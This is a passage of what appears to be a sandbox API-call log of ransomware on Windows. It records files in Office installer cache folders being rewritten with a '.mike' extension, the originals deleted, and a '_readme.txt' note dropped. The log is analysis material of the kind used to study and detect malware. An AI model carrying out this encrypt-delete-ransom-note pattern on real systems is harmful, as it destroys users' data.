Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.681] GetFileType (hFile=0x264) returned 0x1 [0039.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0039.681] GetFileType (hFile=0x264) returned 0x1 [0039.682] WriteFile (in: hFile=0x264, lpBuffer=0x21adaa4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21adaa4*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0039.682] CloseHandle (hObject=0x264) returned 1 [0039.683] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.683] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.683] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1d88740, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1d88740, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1dae8a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xb20)) returned 1 [0039.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.683] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.684] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.684] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21af220 | out: lpFileInformation=0x21af220*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1d88740, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1d88740, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1dae8a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xb20)) returned 1 [0039.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.684] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.684] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0039.684] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.684] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0039.685] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.685] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.685] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.685] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0039.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0039.685] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0039.686] GetFileType (hFile=0x264) returned 0x1 [0039.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0039.686] GetFileType (hFile=0x264) returned 0x1 [0039.686] WriteFile (in: hFile=0x264, lpBuffer=0x21b0f04*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21b0f04*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0039.687] CloseHandle (hObject=0x264) returned 1 [0039.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0039.687] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0039.687] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0039.688] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe1d88740, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1dae8a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.688] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe1d88740, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1dae8a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.688] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0039.688] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0039.688] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1d3c480, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1d3c480, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1d625e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x840, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.xml.mike", cAlternateFileName="EXCELM~1.MIK")) returned 1 [0039.688] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1d88740, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1d88740, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1dae8a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xb20, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0039.688] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1d88740, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1d88740, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1dae8a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0039.689] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1d88740, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1d88740, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1dae8a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0039.689] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0039.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0039.689] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0039.689] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.689] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.689] CoTaskMemFree (pv=0x4fe370) [0039.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.689] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0039.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0039.689] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0039.689] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0039.690] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.752] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.753] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0039.753] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0039.753] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0x0, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0039.753] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0039.753] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.753] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0039.754] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0039.754] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.754] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.754] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.754] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.755] GetFileType (hFile=0x264) returned 0x1 [0039.755] GetFileType (hFile=0x264) returned 0x1 [0039.755] CloseHandle (hObject=0x264) returned 1 [0039.755] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.755] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.755] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0039.755] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0039.755] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21b84c0 | out: lpFileInformation=0x21b84c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa)) returned 1 [0039.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.756] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21b880c | out: lpFileInformation=0x21b880c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa)) returned 1 [0039.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", lpFilePart=0x0) returned 0x55 [0039.756] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All 